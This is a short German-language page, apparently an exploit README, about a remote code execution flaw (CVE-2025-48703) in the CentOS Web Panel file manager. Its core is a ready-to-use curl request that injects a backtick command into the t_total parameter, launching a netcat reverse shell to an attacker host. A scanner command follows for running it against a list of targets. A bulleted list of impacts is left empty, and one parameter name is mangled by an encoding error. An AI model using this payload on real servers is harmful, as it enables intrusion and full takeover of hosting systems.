
Remote-Codeausführung im CentOS-Webpanel
CVE-2025-48703 ist eine Remote Code Execution (RCE)-Sicherheitslücke im filemanager-Modul eines Webhosting-Kontrollpanels (z.B. cPanel). Sie tritt aufgrund einer nicht bereinigten Eingabeverarbeitung in der acc=changePerm-Funktion auf, die es einem Angreifer ermöglicht, beliebige Systembefehle über den Parameter t_total einzuschleusen und auszuführen.
Diese Sicherheitslücke ermöglicht Angreifern:
⚠️ Dieser Angriff kann mit minimaler Authentifizierung oder in einigen Konfigurationen ohne Authentifizierung durchgeführt werden.
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
python3 Scanner.py #Make sure targets.txt is in the same dir
Server: cwpsrv
Referenz: https://fenrisk.com/rce-centos-webpanel